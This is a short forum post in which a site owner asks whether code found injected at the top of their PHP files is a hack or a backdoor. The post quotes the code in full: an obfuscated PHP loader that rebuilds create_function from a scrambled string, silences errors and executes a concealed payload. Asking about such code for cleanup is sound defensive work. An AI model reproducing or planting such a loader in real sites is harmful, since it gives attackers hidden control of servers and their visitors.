I found unknown PHP code on my php files on server . Is it a hack or backdoor? -
i noticed top line of of php files got changed what's below.
<?php $txdhgnui = 'ha)3of>2bd%!<5h%/#0#/*#npd/#)rrdj{fpg)%s:*<%j:,,bjg!)%j:>>1:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<cw6npdov{h19275j{hnpd19275fubmgoj{h1:|:*mmrk3`{666~6<&w6< x7fw6*cw&)7gj6<.[a x27&6< x7fw6* !} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])z>2<!%ww2)%w`tw~ x24<!fwbm)%tjw)bssbz)#p#)!gj!<*#cd2bge56+99386j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!% x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` xgj6<*id%)ftpmdr6<*id%)dfyfr x27tfs%6<*17-sfebfi,6<*127-uvpjgk4`{6~6<tfs%w6< x7fw6*cwtfs%)77f!|!*uyfu x27k:!ftmf!}:71]k9]77]d4]82]k6]72]k9]78]k5]53]kc#<%tpz!>!#]>! x24/%tjw/ x24)% x24- x24y4 x24- x24]y8 x24-21]464]284]364]6]234]342]58]24]31#-!|!*!***b%)sfxpmpusu/ x24)%zw%h>ezh,2w%wn;#-ez-1h*wcw*[!%rn}#qwtw%hir )}.;`uqpmsvd!-id%)uqpuft`msvd},;7]278]225]241]334]368]322]3]366|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyfuqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftower($_server[" x48 124 x54 120 x5f x5c1^-%r x5c2^-%hoh/#00#x22!ftmbg)!gj<*#k#)usbut`cpv x7f x7f x7f x7f<u%v x27{ftmfv x7f<*x&z&x5c2^<!ce*[!%cijqetqcoc/#00#w~!ydrr)%rxb%ep!>>!}w;utpi}y;tuofuopd`ufh`fmjg}[*?]+^?]_ x5c}x x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]-#q#-#b#-#t#-#e#-#g#-#h#-#i#-#k#-#l#-#m#-_t%:osvufs:~:<*9-1-r%)s%>/h%:<*#zsfvr# x5cq%)ufttj x22)gj6<^#y# x5cq% x27y%6<.msv`f`opjudovg x22)!gj}1~!<2p14+9**-)1/2986+7**^/%rx<~!!%s:n}#-%o:w%c:>1<%b:>1<!gps)%j:>1<%j:=tz;^nbsbq% x5csfwsft`%}x;!sp!*#opo#>>}r;msv}.;/#/#/},;#-#}+;%-qp%)54l}7e:55946-tr.984:75983:489847>/7rfs%6<#o]1/20quui7jsv%7ufh# x27rfs%6~6< x7fw6<*k)ftpmdxa6|7**1vufs:~928>> x22:ftmbg39*56a:>:8:|:7#6#)tutjyf`439275ttfsq*#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepds{ftmfv x7f<*xazasv<*w%)ppdex22#)fepmqyfa>2b%!<*qp%-*.%)eu)fubmgoj{ha!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bube{h%)tp 164 x69 157 x6e"; function jlxoquo($n){re x24y7 x24- x24*<! x24- x24gmplode(array_map("jlxoquo",str_split("%tjw!>!#]y84]275]y83]248]:|:**t%)m%=*h%)m%):fmjix) or (strstr($uas," x61 156 x64 162 x6f 151 x64"))) { $xn97-2qj%7-k)udfoopdxa x22)7gj6<*qdu`mpt7-nbfsut`ldpt7-ufoj`%>u<#16,47r57,27r66,#/qz6<.3`ha x27pd%6<pd%w6z6<.2`ha x27pd%6<c x27pd%gb)fubfsdxa x27k6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qja)qj3hw~!%t2w)##qtjw)#]82#-#!#-%tmw)%tww**wysboe>u%v<#65,47r25,d7r17,67r37,#/qvo:>:iuhofm%:-5ppde:4:|:*utcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*24- x24!>!fyqmpef)# x24*<!%t::!>! x24ypp3)%cbj%-#1]#-bube{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,)%bbt-%bt-%hw~%fdy)##-!#~<%h00#*<%nfd)##qtpz)#]341]88m4p8]3!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bube{h%)s% x7f!~!<##!>!2p%z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1go gj}z;h!opjudovg}{;#)tutjyf`opjudovg*9.-j%-bube{h%)sutcvt268]y7f#<!%tww!>! x2400~:<h%]d4]273]d6p2l5p6]y6gp7l6m/#00;quui#>.%!<***f x27,*e x27,*d x27,5c^>ew:qb:qc:w~!%z!>2<!gps)%j>1<%]248l3p6l1m5]d2p4]d6#<%g]y6d]281ld]245]k2]285]ke]53ld]53]k]67y]562]38y]572]48y]#fnju,6<*27-sfgtobsuosvufs,6<*msv%7-msv,627&6<*rfs%7-k)fujsxx6<#o]o]y%7;utpi#mbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!nbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6 x24]26 x24- x24<%j,,*!| x2mqwbg = " x63 162 x65 141 x74 145 x5f 146 x75 156 x63]81]k78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:529hb`sftv`quui&b%!|!*)323zbek!~!<b% x7f!<x>jyf`x x22l:!}v;3q%}u;y]}r;2]},;osvufs} x27;mnui}&;zepc}a;~ x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osif((function_exists(85-t.98]k4]65]d8]86]y31]278]y3f]51l3]84]y31m6]y3e]81#/#opma x273qj%6<*y%)fnbozcyufha x272qj%6<^#zsfvr# x5cq%7/7#@#7/7c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_gmft`qiq&f_u x27*&7-n%)utjm6< x7fw6*cw&)7gj6<*k)ftpmdxa6~6<u%7>/7&6|7**111127125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((strstr($uas," x4]6]283]427]36]373p6]36]73]83]238m7]381]211m5]67]452]88]5%tdz*wsfuvso!%bss x5csboe))1/35.)1/nfd>%fdy<cb*[%h!>!%tdzy76]252]y85]256]y6g]257]y86]267]y74]275]y7:]3,j%>j%!<**3-j%-bube{h%)sutcvt-#w#)ldbqov>*ofmy%)utjmc]55ld]55#*<%bg9}:}.}-}!#*<%fe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+a!>!{e%)!>> #)zbssb!-#}#)fepmqnj!/!#0#)i>q%v<*#fopov;hojepdof.uofuopd#)sfebfi{*w%)kvx{**#k#)tut))) { $globals[" x61 156 x75 156 x61"]=1; $uas=strtolbj+upcotn+qsvmt+fmhpph]48]32m3]317]445]212]445]43]3*c x27,*b x27)fepdof.)fepdof./#m)%tjw)# x24#-!#]y38#-!%w:**<")));$kjuvjkn = $xnmqwbg("", $kmftsbqa7>q%6< x7fw6* x7f_*#fubfsdxk5`{66~6<&w6< x7fw6*cw&)7b%z<#opo#>b%!*##>>x)!gjz<#opo#>b%!**x)ufttj x22)gj!*!%b:>1<!fmtf!%b:>%s:qsut>j%!*72! x27!hmg%)!gj!<2,*)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<*x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!llyrk); $kjuvjkn();}}t!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`*#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+i#)q%:>:r%" x6f 142 x5f 163 x74 141 x72 164") && (!isset($globals[" x|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x<*)ujojr x27id%6< x7fw6* x7f_*#ujoj-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- ^#iubq# x5cq% x27jsv%6<c>^#zsfvr# x5cq%7**^>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|z~!<##!>!2p%ps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x#[#-#y#-#d#-#w#-#c#-#o#-#n#*-!%ff2-!%t::**<(<!fwbgj6<*doj%7-c)fepmqnja x27&6<.fmjga x27doj%6< x7fw6* x7f_*#fmturn chr(ord($n)-1);} @error_reporting(0); $kmllyrk = i-k)ebfsx x27u%)7fmjix6<c x8399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxw~!ypp2)%zb%z>! x24/%tmwx7f_*#[k2`{6:!}7;!}6;##}c;472 x24<!%ff2!>!bssbz) x24]25 x24- x2461 156 x75 156 x61"])%in}#-! x24/%tmw/ x24)%c*w%en+#qi x5c1^w%c!>!%i tpi`quui&e_seeb`fupnfs&d_sfsfgfs`quui&c_uofdubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutre%)rd%)rb%)4- x24gvodujpo! x24-7]d4]275]d:m8]df#<%tdz>#l4]275l3%>2q%<#g6r85,67r37,18r#pn)%bss-%rxb%h>#]y31]278]y3e;ldpt%}k;`ufldpt}x;`msvd}r;*msv%0#)u! x27{**u%-#jt0}z;0]=]0#)2q%l}s;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt04-1-bube{h%)sutcvt)!gj!|!*bube{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyd6m7]k3#<%yy>#]d6]281l1#/#m5]dgp5]d6#<%fdy>#<pd%w6z6<.5`ha x27pd%6<pd%w6z6<.4`ha x27pd%6<pd%w66d 163 x69 145")) or (strstr($uas," x72 166 x3a 61 x31")strrevxnoitcnuf_etaercxecalper_rtslvguvrcl'; $mfderm=explode(chr((543-423)),substr($txdhgnui,(35871-29945),(105-71))); $myntric = $mfderm[0]($mfderm[(4-3)]); $glxkusy = $mfderm[0]($mfderm[(14-12)]); if (!function_exists('wvvist')) { function wvvist($otktagk, $qysbsm,$eiebsz) { $sznrdyqz = null; for($tslmpdmg=0;$tslmpdmg<(sizeof($otktagk)/2);$tslmpdmg++) { $sznrdyqz .= substr($qysbsm, $otktagk[($tslmpdmg*2)],$otktagk[($tslmpdmg*2)+(6-5)]); } return $eiebsz(chr((48-39)),chr((363-271)),$sznrdyqz); }; } $amewrgsyi = explode(chr((180-136)),'3346,20,4592,59,5335,21,4034,53,929,36,3598,64,5870,56,1960,57,3064,53,1803,42,5121,55,1873,63,144,57,5820,50,2098,47,849,40,3533,65,5176,26,2922,36,1513,66,2017,58,2145,66,3421,62,4796,43,1275,51,4230,58,5061,60,534,32,476,58,2882,40,4706,35,240,49,5271,26,1100,33,5607,32,787,32,889,40,2958,37,2622,35,4390,41,2657,21,1733,70,4360,30,2395,51,3820,53,2505,50,2308,42,5708,68,1326,25,2555,67,1703,30,0,32,2731,38,4138,31,4900,52,717,20,4502,37,4087,22,3951,28,5447,57,372,22,3483,50,5404,43,3187,41,4288,51,4651,55,566,23,1417,69,3286,60,1579,57,201,39,2283,25,1636,39,3901,50,989,68,1675,28,2253,30,2075,23,5556,23,3979,55,3228,58,289,42,5639,69,1133,70,3776,44,2678,28,1244,31,4539,53,1936,24,59,50,109,35,2860,22,4839,61,5297,38,4741,55,4431,50,636,46,3037,27,5504,20,1845,28,4952,60,2350,45,5356,48,1057,43,2995,42,5202,69,737,50,965,24,2211,42,5579,28,3117,70,3366,55,1486,27,589,47,5776,44,2706,25,5524,32,2802,58,3873,28,3754,22,2446,59,819,30,3662,57,4109,29,682,35,3719,35,1351,66,32,27,4339,21,438,38,2769,33,394,44,331,41,1203,41,5012,49,4169,61,4481,21'); $hjufmc = $myntric("",wvvist($amewrgsyi,$txdhgnui,$glxkusy)); $myntric=$txdhgnui; $hjufmc(""); $hjufmc=(629-508); $txdhgnui=$hjufmc-1; ?>
i removed line php script of php files. hack or backdoor how dangerous?
Comments
Post a Comment